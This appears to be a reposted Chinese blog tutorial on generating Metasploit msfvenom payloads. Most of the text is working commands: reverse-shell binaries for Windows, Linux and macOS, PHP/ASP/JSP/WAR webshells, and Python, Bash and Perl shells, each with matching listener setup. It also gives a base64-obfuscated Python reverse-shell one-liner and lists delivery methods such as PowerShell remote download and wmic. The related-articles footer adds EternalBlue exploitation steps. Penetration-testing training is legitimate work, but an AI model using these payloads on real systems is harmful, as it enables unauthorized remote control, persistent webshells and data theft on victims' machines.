生成msf常用payload

最新推荐文章于 2024-03-13 14:11:24 发布
最新推荐文章于 2024-03-13 14:11:24 发布
阅读量2.5k 收藏 10
点赞数
分类专栏: 信安之路 文章标签: 系统安全
原文链接:https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247484849&idx=1&sn=4485a4770098e55c9f2b03231668a1a6&chksm=ec1e3599db69bc8f1f3cee713d8fc3b4026c2befd67807a0accb8d2fccdfab59cc90a1885464&token=1053512658&lang=zh_CN#rd
版权

msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。

在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:

msfvenom -l

生成二进制文件

关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

如何利用

针对这个部分就以Windows为例,使用上面的命令生成一个exe的payload,命令如下:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.128 LPORT=4444 -f exe > shell.exe

复制shell.exe到Windows机器,然后kali下开启msf使用如下命令监听4444端口:

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.88.128

set LPORT  4444

set ExitOnSession false

exploit -j -z

执行完之后在Windows下执行shell.exe,然后结果如图:

在这里既然使用到了在Windows下执行应用程序,我们就大概盘点一下在Windows执行应用程序的几种方式:

  • 双击运行

  • cmd下运行exe

  • 利用Powershell远程下载执行

  • 利用at或schtasks设置计划任务执行

  • 利用wmic远程命令执行

  • 其他的方式请各位补充

生成webshell脚本

在做web渗透的时候,经常会用到webshell,我们经常用的一句话用菜刀连接,如何使用MSFVenom生成一个可以用msf操作的webshell呢?

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

如何利用

下面以php为例做一下测试,使用以下命令生成一个webshell:

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.88.128 LPORT=4444 -f raw > shell.php

在kali上使用msf执行下面的命令,监听端口4444:

msfconsole

use exploit/multi/handler

set PAYLOAD php/meterpreter_reverse_tcp

set LHOST 192.168.88.128

set LPORT  4444

set ExitOnSession false

exploit -j -z

将shell.php放在web目录下,使用浏览器访问,或者使用以下命令执行:

php shell.php

脚本shell

关于使用脚本反弹shell的方式,主要以python、bash、perl为例。

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

如何使用

下面就以Python为例做一下测试,使用以下命令生成一个脚本:

msfvenom -p cmd/unix/reverse_python LHOST=192.168.88.128 LPORT=4444 -f raw > shell.py

在kali上使用msf执行下面的命令,监听端口4444:

msfconsole

use exploit/multi/handler

set PAYLOAD cmd/unix/reverse_python

set LHOST 192.168.88.128

set LPORT  4444

set ExitOnSession false

exploit -j -z

然后复制shell.py中的内容在linux命令行下执行,如下:

python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIxOTIuMTY4Ljg4LjEyOCIgICAgICA7ICAgIHBvcnQ9NDQ0NCAgICAgIDsgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICAgIHMuY29ubmVjdCgoaG9zdCxwb3J0KSkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDEpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMikgICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"

结果如图:

总结

本文的主要内容是关于使用msfvenom生成常用的反向连接的shell,msfvenom可以生成的shell很多,不可能一一列举,这里只是提一下,不好意思又给大家分享了一个水文,请大家凑活看看,有什么建议和意见请下方留言。

myh0st@信安之路
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msf payload大全.xmind
05-20
msf payload大全.xmind
浅谈MSF渗透测试
02-24
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。前不久MSF从4.7升级到MSF5.0,其中改进了数据库的处理逻辑,优化了msfconsole终端操作,并将PostgreSQL作为一个RESTful服务单独运行。此外还加入一个Web服务框架,新的免杀模块,优化了控制功能等。下面小白总结了一下在渗透测试中,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法
05-24 6347
【渗透工具】MSFconsole进阶:Payload(攻击载荷模块)
【网络安全】 MSF生成木马教程
最新发布
一直被模仿,从未被超越
03-13 889
1、当客户端点击木马后,Kali 成功获取。2、启动Apache,方便客户端下载。1、在Kali机器上面生成木马。本例用的是 Themida。二、Kali 开启监听。2、设置Payload
kali 渗透msf
11-14
kali渗透测试利器
MSF终端命令.txt
02-24
msf的一些终端命令
msf生成payload并注入到可执行程序exe中
redwand的博客
07-22 4752
msfconsole下的generate与msfvomen命令实际是不同环境下的同一个命令,其功能基本相同,这里我们要学习的重点是使用-k -x 选项将payload注入到可以执行文件exe中,这项技能在实战中后渗透测试的可持久化中经常会被用到。
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4227
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
Msfconsole中set payload命令最新改进
大学霸__IT达人
02-26 2854
Msfconsole中setpayload命令最新改进 为了方便用户的输入,Msfconsole改进了setpayload命令的输入。在执行setpayload命令时,可以使用三种前缀,分别是/payloadpayload、和/。或者,不使用任何前缀,直接指定攻击载荷路径即可。其中,可以执行的四种方式如下所示: (1)msf5exploit(windows/smb/ms17_010_et...
路由代理(msf、CobaltStrike)与内网渗透
weixin_42478365的博客
08-12 2435
kali:192.168.239.0/24 win7:192.168.239.0/24 192.168.52.0/24 win2003:192.168.52.0/24 win2008:192.168.52.0/24 CobaltStrike代理 开启CobaltStrike 在命令行中输入 socks 22 通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.52.0/24的web应用,相关配置如下所示: 之后便可以访问内网 也可以用用
msf基础渗透流程
那年烟花终亦冷
04-17 654
1.使用nmap收集信息 netdiscover //发现存活主机 nmap 收集信息 nmap -sT -T4 -p- 192.168.23.128 //sT:TCP三次握手 //T4:扫描耗时级别,数值越大速度越快,可靠性相应降低。 //-p:指定端口 && -p-:全部端口 web目录爆破(下载dirsearch工具) cd dirsearch/
项目管理利刃之MSF
03-03
火龙果软件工程技术中心  MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目的参与者,如项目经理、开发工程师、系统架构师、顾问、质量管理人员等,想找到项目管理中遇到问题的解决方案,相信本文会给您一定的帮助。MSF为成功地规划、设计、开发和部署IT解决方案提供了一套成熟的方法论。与具有固定框架的方法相反,MSF提供了一个可以伸缩的灵活框架,以满足任何规模的组织或者项目开发团队的需要。MSF指导由原理、模型和用来管理人员、项目和技术元素的准则
msf命令全集
06-05
msf命令全集
msf开发者文档
09-28
此为msf开发文档,项移植应用msf可以阅读。msf采用ruby编写。
php-msf源码详解
10-18
主要介绍了php-msf源码的意思以及用法相关问题,有需要的朋友跟着参考学习下吧。
MSF技术总结
05-07
metasploit framework 常用命令说明和使用,及其他高级用法的使用总结
MsfpayloadGUI:msfpayloadmsfencode gui-开源
07-09
这个简单的软件是我尝试为带有 QT 库的 msfpayloadmsfencode 程序开发的 gui。
第九十七课:MSF配置自定义Payload控制目标主机权限.docx
09-15
第九十七课:MSF配置自定义Payload控制目标主机权限.docx
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
MSF下载payload
08-18
您可以在Metasploit Framework (MSF) 中使用以下命令来下载一个payload: 1. 首先,打开终端并启动MSF控制台: ``` msfconsole ``` 2. 接下来,选择一个合适的exploit模块,比如使用`exploit/windows/smb/ms17_010_eternalblue`模块进行攻击: ``` use exploit/windows/smb/ms17_010_eternalblue ``` 3. 设置exploit模块的相关参数,例如目标IP地址、目标端口等。您可以使用`show options`命令查看可用参数列表并设置它们: ``` set RHOSTS <目标IP地址> set RPORT <目标端口> ``` 4. 配置payload生成选项。您可以使用`show payloads`命令查看可用payload列表,并选择适合您需求的payload。设置payload所需的参数,例如LHOST和LPORT: ``` set payload <payload名称> set LHOST <本地IP地址> set LPORT <本地端口> ``` 5. 最后,运行exploit以攻击目标主机并生成payload: ``` exploit ``` 生成payload将会保存在Metasploit的工作目录中,您可以使用`show options`命令查看payload的保存路径。 请注意,上述步骤仅供学习和合法的渗透测试目的使用。在进行任何网络活动时,请遵守法律法规,并仅在授权范围内使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值